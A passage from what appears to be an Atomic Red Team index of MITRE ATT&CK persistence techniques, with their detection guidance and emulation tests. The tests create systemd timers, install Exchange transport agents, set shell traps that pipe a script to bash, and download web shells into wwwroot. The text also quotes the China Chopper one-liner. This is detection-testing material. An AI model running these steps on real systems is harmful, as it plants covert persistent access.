x_mitre_detection: |- - Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. - - Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables. - - Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020) - x_mitre_permissions_required: - - User - - root - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1053.006 - atomic_tests: - - name: Create Systemd Service and Timer - auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b - description: "This test creates Systemd service and timer then starts and enables - the Systemd timer \n" - supported_platforms: - - linux - input_arguments: - path_to_systemd_service: - description: Path to systemd service unit file - type: Path - default: "/etc/systemd/system/art-timer.service" - path_to_systemd_timer: - description: Path to service timer file - type: Path - default: "/etc/systemd/system/art-timer.timer" - systemd_service_name: - description: Name of systemd service - type: String - default: art-timer.service - systemd_timer_name: - description: Name of systemd service timer - type: String - default: art-timer.timer - executor: - command: | - echo "[Unit]" > #{path_to_systemd_service} - echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service} - echo "[Service]" >> #{path_to_systemd_service} - echo "Type=simple" >> #{path_to_systemd_service} - echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service} - echo "[Install]" >> #{path_to_systemd_service} - echo "WantedBy=multi-user.target" >> #{path_to_systemd_service} - echo "[Unit]" > #{path_to_systemd_timer} - echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer} - echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer} - echo "[Timer]" >> #{path_to_systemd_timer} - echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer} - echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer} - echo "[Install]" >> #{path_to_systemd_timer} - echo "WantedBy=timers.target" >> #{path_to_systemd_timer} - systemctl start #{systemd_timer_name} - systemctl enable #{systemd_timer_name} - systemctl daemon-reload - cleanup_command: | - systemctl stop #{systemd_timer_name} - systemctl disable #{systemd_timer_name} - rm #{path_to_systemd_service} - rm #{path_to_systemd_timer} - systemctl daemon-reload - name: bash - T1542.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1542.005 - url: https://attack.mitre.org/techniques/T1542/005 - - source_name: Cisco Blog Legacy Device Attacks - url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 - description: Omar Santos. (2020, October 19). Attackers Continue to Target - Legacy Devices. Retrieved October 20, 2020. - - source_name: Cisco IOS Software Integrity Assurance - Secure Boot - url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#35 - description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure - Boot. Retrieved October 19, 2020. - - source_name: Cisco IOS Software Integrity Assurance - Image File Verification - url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7 - description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco - IOS Image File Verification. Retrieved October 19, 2020. - - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification - url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13 - description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco - IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020. - - source_name: Cisco IOS Software Integrity Assurance - Command History - url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23 - description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command - History. Retrieved October 21, 2020. - - source_name: Cisco IOS Software Integrity Assurance - Boot Information - url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26 - description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot - Information. Retrieved October 21, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: TFTP Boot - description: |- - Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. - - Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks) - id: attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-10-22T16:35:53.806Z' - created: '2020-10-20T00:06:56.180Z' - x_mitre_data_sources: - - Network device run-time memory - - Network device command history - - Network device configuration - - File monitoring - - Network device logs - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification) - - Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Network - atomic_tests: [] - T1547.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.003 - url: https://attack.mitre.org/techniques/T1547/003 - - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top - description: Microsoft. (2018, February 1). Windows Time Service (W32Time). - Retrieved March 26, 2018. - source_name: Microsoft W32Time Feb 2018 - - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx - description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. - source_name: Microsoft TimeProvider - - url: https://github.com/scottlundgren/w32time - description: Lundgren, S. (2017, October 28). w32time. Retrieved March 26, - 2018. - source_name: Github W32Time Oct 2017 - - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings - description: Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. - Retrieved March 26, 2018. - source_name: Microsoft W32Time May 2017 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Time Providers - description: |- - Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider) - - Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider) - - Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017) - id: attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T15:24:26.476Z' - created: '2020-01-24T15:51:52.317Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_detection: |- - Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017) - - The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns) - x_mitre_data_sources: - - API monitoring - - Binary file metadata - - DLL monitoring - - File monitoring - - Loaded DLLs - - Process monitoring - x_mitre_contributors: - - Scott Lundgren, @5twenty9, Carbon Black - x_mitre_platforms: - - Windows - atomic_tests: [] - T1205: - technique: - revoked: false - id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Traffic Signaling - description: |- - Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. - - Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). - - The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. - - On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. - external_references: - - source_name: mitre-attack - external_id: T1205 - url: https://attack.mitre.org/techniques/T1205 - - url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631 - description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible - backdoor. Retrieved October 13, 2018.' - source_name: Hartrell cd00r 2002 - - source_name: Cisco Synful Knock Evolution - url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices - description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco - IOS devices. Retrieved October 19, 2020. - - source_name: FireEye - Synful Knock - url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html - description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful - Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. - - source_name: Cisco Blog Legacy Device Attacks - url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 - description: Omar Santos. (2020, October 19). Attackers Continue to Target - Legacy Devices. Retrieved October 20, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-10-21T15:30:44.964Z' - created: '2018-04-18T17:59:24.739Z' - x_mitre_contributors: - - Josh Day, Gigamon - x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Linux - - macOS - - Windows - - Network - x_mitre_network_requirements: true - x_mitre_detection: Record network packets sent to and from the system, looking - for extraneous packets that do not belong to established flows. - x_mitre_defense_bypassed: - - Defensive network service scanning - x_mitre_version: '2.1' - x_mitre_is_subtechnique: false - atomic_tests: [] - T1505.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1505.002 - url: https://attack.mitre.org/techniques/T1505/002 - - source_name: Microsoft TransportAgent Jun 2016 - url: https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help - description: Microsoft. (2016, June 1). Transport agents. Retrieved June 24, - 2019. - - source_name: ESET LightNeuron May 2019 - url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf - description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from - remote code execution. Retrieved June 24, 2019.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Transport Agent - description: "Adversaries may abuse Microsoft transport agents to establish - persistent access to systems. Microsoft Exchange transport agents can operate - on email messages passing through the transport pipeline to perform various - tasks such as filtering spam, filtering malicious attachments, journaling, - or adding a corporate signature to the end of all outgoing emails.(Citation: - Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport - agents can be written by application developers and then compiled to .NET - assemblies that are subsequently registered with the Exchange server. Transport - agents will be invoked during a specified stage of email processing and carry - out developer defined tasks. \n\nAdversaries may register a malicious transport - agent to provide a persistence mechanism in Exchange Server that can be triggered - by adversary-specified email events.(Citation: ESET LightNeuron May 2019) - Though a malicious transport agent may be invoked for all emails passing through - the Exchange transport pipeline, the agent can be configured to only carry - out specific tasks in response to adversary defined criteria. For example, - the transport agent may only carry out an action like copying in-transit attachments - and saving them for later exfiltration if the recipient email address matches - an entry on a list provided by the adversary. " - id: attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-25T22:59:59.124Z' - created: '2019-12-12T15:08:20.972Z' - x_mitre_detection: Consider monitoring application logs for abnormal behavior - that may indicate suspicious installation of application software components. - Consider monitoring file locations associated with the installation of new - application software components such as paths from which applications typically - load such extensible components. - x_mitre_data_sources: - - Application logs - - File monitoring - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - SYSTEM - - Administrator - - root - x_mitre_contributors: - - ESET - - " Christoffer Strömblad" - x_mitre_platforms: - - Linux - - Windows - identifier: T1505.002 - atomic_tests: - - name: Install MS Exchange Transport Agent Persistence - auto_generated_guid: 43e92449-ff60-46e9-83a3-1a38089df94d - description: | - Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla. - More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help - supported_platforms: - - windows - input_arguments: - class_factory: - description: Class factory of transport agent. - type: string - default: Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory - dll_path: - description: Path of DLL to use as transport agent. - type: path - default: c:\program files\microsoft\Exchange Server\v15\bin\Microsoft.Exchange.Security.Interop.dll - transport_agent_identity: - description: Friendly name of transport agent once installed. - type: string - default: Security Interop Agent - dependencies: - - description: 'Microsoft Exchange SnapIn must be installed - -' - prereq_command: 'Get-TransportAgent -TransportService FrontEnd - -' - get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn - -' - executor: - command: | - Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} - Enable-TransportAgent #{transport_agent_identity} - Get-TransportAgent | Format-List Name,Enabled - cleanup_command: | - if(Get-Command "Get-TransportAgent" -ErrorAction Ignore){ - Disable-TransportAgent #{transport_agent_identity} - Uninstall-TransportAgent #{transport_agent_identity} - Get-TransportAgent - } - name: powershell - elevation_required: true - T1546.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.005 - url: https://attack.mitre.org/techniques/T1546/005 - - source_name: Trap Manual - url: https://ss64.com/bash/trap.html - description: ss64. (n.d.). trap. Retrieved May 21, 2019. - - source_name: Cyberciti Trap Statements - url: https://bash.cyberciti.biz/guide/Trap_statement - description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, - 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Trap - description: |- - Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. - - Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements) - id: attack-pattern--63220765-d418-44de-8fae-694b3912317d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T16:43:02.273Z' - created: '2020-01-24T14:17:43.906Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: Trap commands must be registered for the shell or programs, - so they appear in files. Monitoring files for suspicious or overly broad trap - commands can narrow down suspicious behavior during an investigation. Monitor - for suspicious processes executed through trap interrupts. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_platforms: - - macOS - - Linux - identifier: T1546.005 - atomic_tests: - - name: Trap - auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61 - description: | - After exiting the shell, the script will download and execute. - After sending a keyboard interrupt (CTRL+C) the script will download and execute. - supported_platforms: - - macos - - linux - executor: - command: | - trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" EXIT - exit - trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" SIGINt - name: sh - T1078: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1078 - url: https://attack.mitre.org/techniques/T1078 - - external_id: CAPEC-560 - source_name: capec - url: https://capec.mitre.org/data/definitions/560.html - - url: https://technet.microsoft.com/en-us/library/dn535501.aspx - description: Microsoft. (2016, April 15). Attractive Accounts for Credential - Theft. Retrieved June 3, 2016. - source_name: TechNet Credential Theft - - url: https://technet.microsoft.com/en-us/library/dn487457.aspx - description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved - June 3, 2016. - source_name: TechNet Audit Policy - description: |- - Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. - - The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) - name: Valid Accounts - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-10-19T16:01:22.724Z' - created: '2017-05-31T21:31:00.645Z' - x_mitre_version: '2.1' - x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring - x_mitre_defense_bypassed: - - Firewall - - Host intrusion prevention systems - - Network intrusion detection system - - Application control - - System access controls - - Anti-virus - x_mitre_detection: |- - Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). - - Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. - x_mitre_permissions_required: - - User - - Administrator - x_mitre_effective_permissions: - - User - - Administrator - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - - SaaS - - Office 365 - - Azure AD - x_mitre_contributors: - - Netskope - - Mark Wee - - Praetorian - x_mitre_is_subtechnique: false - atomic_tests: [] - T1505.003: - technique: - created: '2019-12-13T16:46:18.927Z' - modified: '2020-09-16T19:34:19.752Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - type: attack-pattern - id: attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb - description: "Adversaries may backdoor web servers with web shells to establish - persistent access to systems. A Web shell is a Web script that is placed on - an openly accessible Web server to allow an adversary to use the Web server - as a gateway into a network. A Web shell may provide a set of functions to - execute or a command-line interface on the system that hosts the Web server.\n\nIn - addition to a server-side script, a Web shell may have a client interface - program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) - Web shell client).(Citation: Lee 2013) " - name: Web Shell - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1505.003 - url: https://attack.mitre.org/techniques/T1505/003 - - external_id: CAPEC-650 - source_name: capec - url: https://capec.mitre.org/data/definitions/650.html - - source_name: Lee 2013 - description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down - the China Chopper Web Shell - Part I. Retrieved March 27, 2015. - url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html - - url: https://www.us-cert.gov/ncas/alerts/TA15-314A - description: US-CERT. (2015, November 13). Compromised Web Servers and Web - Shells - Threat Awareness and Guidance. Retrieved June 8, 2016. - source_name: US-CERT Alert TA15-314A Web Shells - x_mitre_platforms: - - Linux - - Windows - - macOS - x_mitre_data_sources: - - Process monitoring - - Netflow/Enclave netflow - - File monitoring - - Authentication logs - x_mitre_detection: "Web shells can be difficult to detect. Unlike other forms - of persistent remote access, they do not initiate connections. The portion - of the Web shell that is on the server may be small and innocuous looking. - The PHP version of the China Chopper Web shell, for example, is the following - short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless, - detection mechanisms exist. Process monitoring may be used to detect Web servers - that perform suspicious actions such as running cmd.exe or accessing files - that are not in the Web directory. File monitoring may be used to detect changes - to files in the Web directory of a Web server that do not match with updates - to the Web server's content and may indicate implantation of a Web shell script. - Log authentication attempts to the server and any unusual traffic patterns - to or from the server and internal network. (Citation: US-CERT Alert TA15-314A - Web Shells) " - x_mitre_permissions_required: - - SYSTEM - - User - x_mitre_system_requirements: - - Adversary access to Web server with vulnerability or account to upload and - serve the Web shell file. - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - identifier: T1505.003 - atomic_tests: - - name: Web Shell Written to Disk - auto_generated_guid: 0a2ce662-1efa-496f-a472-2fe7b080db16 - description: | - This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. - Idea from APTSimulator. - cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx - supported_platforms: - - windows - input_arguments: - web_shell_path: - description: The path to drop the web shell - type: string - default: C:\inetpub\wwwroot - web_shells: - description: Path of Web Shell - type: path - default: PathToAtomicsFolder\T1505.003\src\ - dependency_executor_name: powershell - dependencies: - - description: 'Web shell must exist on disk at specified location (#{web_shells}) - -' - prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" - executor: - command: 'xcopy #{web_shells} #{web_shell_path} - -' - cleanup_command: 'del #{web_shell_path} /q >nul 2>&1 - -' - name: command_prompt - T1546.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.003 - url: https://attack.mitre.org/techniques/T1546/003 - - url: https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf - description: 'Mandiant. (2015, February 24). M-Trends 2015: A View from the - Front Lines. Retrieved May 18, 2016.' - source_name: Mandiant M-Trends 2015 - - source_name: FireEye WMI SANS 2015 - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf - description: Devon Kerr. (2015). There's Something About WMI. Retrieved May - 4, 2020. - - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf - description: Ballenthin, W., et al. (2015). Windows Management Instrumentation - (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. - source_name: FireEye WMI 2015 - - url: https://www.secureworks.com/blog/wmi-persistence - description: Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, - March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016. - source_name: Dell WMI Persistence - - source_name: Microsoft MOF May 2018 - url: https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof- - description: Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved - January 24, 2020. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - - description: French, D. (2018, October 9). Detecting & Removing an Attacker’s - WMI Persistence. Retrieved October 11, 2019. - url: https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 - source_name: Medium Detecting WMI Persistence - - source_name: Microsoft Register-WmiEvent - url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1 - description: Microsoft. (n.d.). Retrieved January 24, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Windows Management Instrumentation Event Subscription - description: |- - Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015) - - Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018) - - WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. - id: attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-05-05T12:02:45.522Z' - created: '2020-01-24T14:07:56.276Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: |- - Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) - - Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1086) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process). - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - WMI Objects - x_mitre_platforms: - - Windows - identifier: T1546.003 - atomic_tests: - - name: Persistence via WMI Event Subscription - auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0 - description: | - Run from an administrator powershell window. After running, reboot the victim 